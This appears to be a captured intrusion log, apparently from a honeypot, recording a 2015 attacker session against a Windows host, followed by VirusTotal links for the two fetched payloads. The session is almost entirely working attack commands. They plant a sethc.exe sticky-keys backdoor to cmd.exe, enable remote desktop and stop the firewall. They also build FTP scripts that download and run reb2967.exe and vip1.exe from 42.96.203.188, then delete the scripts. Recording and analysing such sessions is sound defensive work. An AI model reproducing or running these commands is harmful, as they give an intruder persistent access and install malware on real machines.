- 2015-10-16 23:33:19 - 42.96.140.141 incoming shell command (captured session, recorded verbatim):
- copy "%systemroot%\$NtServicePackUninstall$\ftp.exe" "%systemroot%\system32\ftp.exe"/y
- copy "%systemroot%\$NtServicePackUninstall$\ftp.exe" "%systemroot%\system32\tvcv.exe"/y
- copy "%systemroot%\system32\dllcache\ftp.exe" "%systemroot%\system32\tvcv.exe"/y
- copy "%systemroot%\system32\dllcache\ftp.exe" "%systemroot%\system32\ftp.exe"/y
- copy "%systemroot%\$NtServicePackUninstall$\net1.exe" "%systemroot%\system32\net1.exe"/y
- copy "%systemroot%\ServicePackFiles\i386\ftp.exe" "%systemroot%\system32\tvcv.exe"/y
- copy "%systemroot%\ServicePackFiles\i386\ftp.exe" "%systemroot%\system32\ftp.exe"/y
- reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe" /f
- reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe" /f
- reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net1.exe" /f
- reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe" /f
- reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f /v Debugger /d "%systemroot%\system32\cmd.exe"
- reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_DWORD /d "0" /f
- cacls %systemroot%\system32\ftp.exe /e /p system:f
- cacls %systemroot%\system32\net1.exe /e /p system:f
- cacls %systemroot%\system32\wscript.exe /e /p system:f
- net1 stop sharedaccess
- echo open 42.96.203.188>>assa2an.txt
- echo cesi>>assa2an.txt
- echo cesi>>assa2an.txt
- echo bin>>assa2an.txt
- echo get reb2967.exe>>assa2an.txt-
- echo bye>>assa2an.txt
- ftp -s:assa2an.txt
- reb2967.exe
- reb2967.exe
- del assa2an.txt
- echo open 42.96.203.188 >>sadsad.txt
- echo cesi>>sadsad.txt
- echo cesi>>sadsad.txt
- echo bin>>sadsad.txt
- echo get vip1.exe>>sadsad.txt
- echo bye>>sadsad.txt
- tvcv.exe -s:sadsad.txt
- vip1.exe
- vip1.exe
- del sadsad.txt
- cacls %systemroot%\system32\ftp.exe /e /p
- system:n
- cacls %systemroot%\system32\wscript.exe /e /p system:n
- exit
- exit
- ##########################################################################
- Payloads (samples fetched by the session above, with their VirusTotal analysis links):
- vip1.exe - https://www.virustotal.com/fr/file/03f4dc0cace57cc3bfdccde268acfe88ba9713afe4edb915cd516fe0d43962c4/analysis/1444397185/
- reb2967.exe - https://www.virustotal.com/fr/file/fa1bdae4ca16f9c22842408a4f711a491a4e0cd11d0c64c8e4bd1b8e08eb8420/analysis/1444397180/